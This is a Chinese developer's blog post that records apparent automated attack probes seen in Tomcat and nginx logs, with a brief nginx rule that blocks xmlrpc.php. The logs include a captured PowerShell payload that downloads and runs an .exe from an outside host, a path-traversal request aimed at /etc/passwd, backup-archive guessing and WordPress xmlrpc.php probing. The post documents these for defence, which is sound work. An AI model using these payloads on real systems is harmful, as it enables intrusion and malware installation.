Web项目中的java后台遇到的几个错误,可能是被机器扫描攻击了

作者: admin 分类: 异常处理 发布时间: 2021-01-15 17:17  阅读: 1,817 views

以下是网站流量 200~ 300 IP 的时候,java程序的接口遇到的几个情况。

暂存一下, 有机器会根据请求地址进行一些试探攻击,

INFO: Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:414)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:294)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:834)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1415)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)


Dec 17, 2020 9:09:33 AM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [mail[#markup]] with value [ powershell (new-object System.Net.WebClient).DownloadFile('http://UeR.ReiyKiQ.ir/download.exe','%SystemRoot%/Temp/ccafkbgexipttxx2042.exe');start %SystemRoot%/Temp/ccafkbgexipttxx2042.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.

https://zhuanlan.zhihu.com/p/169516857

利用目录穿越漏洞进行攻击

2020-12-22 12:52:34,944  WARN ResourceHttpRequestHandler:649 - Path contains "../" after call to StringUtils#cleanPath: [foo/default/master/../../../../../../../etc/passwd]

通过地址栏输入特殊字符进行攻击

INFO: Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:414)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:294)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:834)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1415)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)

20210209 记录,查看nginx日志,发现每天都有ip在扫描网站根目录,它在根据域名进行压缩包的猜测,所以要注意备份文件的命名及位置。

45.121.104.188 - - [09/Feb/2021:13:47:23 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:23 +0800] "HEAD /www.oxoxox.net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:23 +0800] "HEAD /www_oxoxox_net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /wwwoxoxoxnet.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /oxoxox.net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /oxoxox_net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /oxoxoxnet.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:25 +0800] "HEAD /oxoxox.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:25 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:25 +0800] "HEAD /www.oxoxox.net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /www_oxoxox_net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /wwwoxoxoxnet.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /oxoxox.net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /oxoxox_net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /oxoxoxnet.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /oxoxox.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /www.oxoxox.net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /www_oxoxox_net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /wwwoxoxoxnet.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /oxoxox.net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /oxoxox_net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /oxoxoxnet.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /oxoxox.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /wwwroot.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /wwwroot.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /wwwroot.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:30 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:30 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "-"

20210219日,查看access日志时,发现有如下情况, 这个是利用 wordpress的 xmlrpc.php进行无登录嗅探。

47.244.235.248 - - [18/Feb/2021:18:26:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:20 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"

...back 1 page
47.244.235.248 - - [18/Feb/2021:18:25:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"

网上查到有几种处理方式

  1. 禁止ip,但是大部分是ip代理池,封ip封不完
  2. 删除xmlrpc.php文件(对wp系统不熟悉的话,不知道删除了有什么影响)
  3. nginx的 配置文件做禁止转发处理
location =/xmlrpc.php{
    deny all;
}

   原创文章,转载请标明本文链接: Web项目中的java后台遇到的几个错误,可能是被机器扫描攻击了

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

一条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注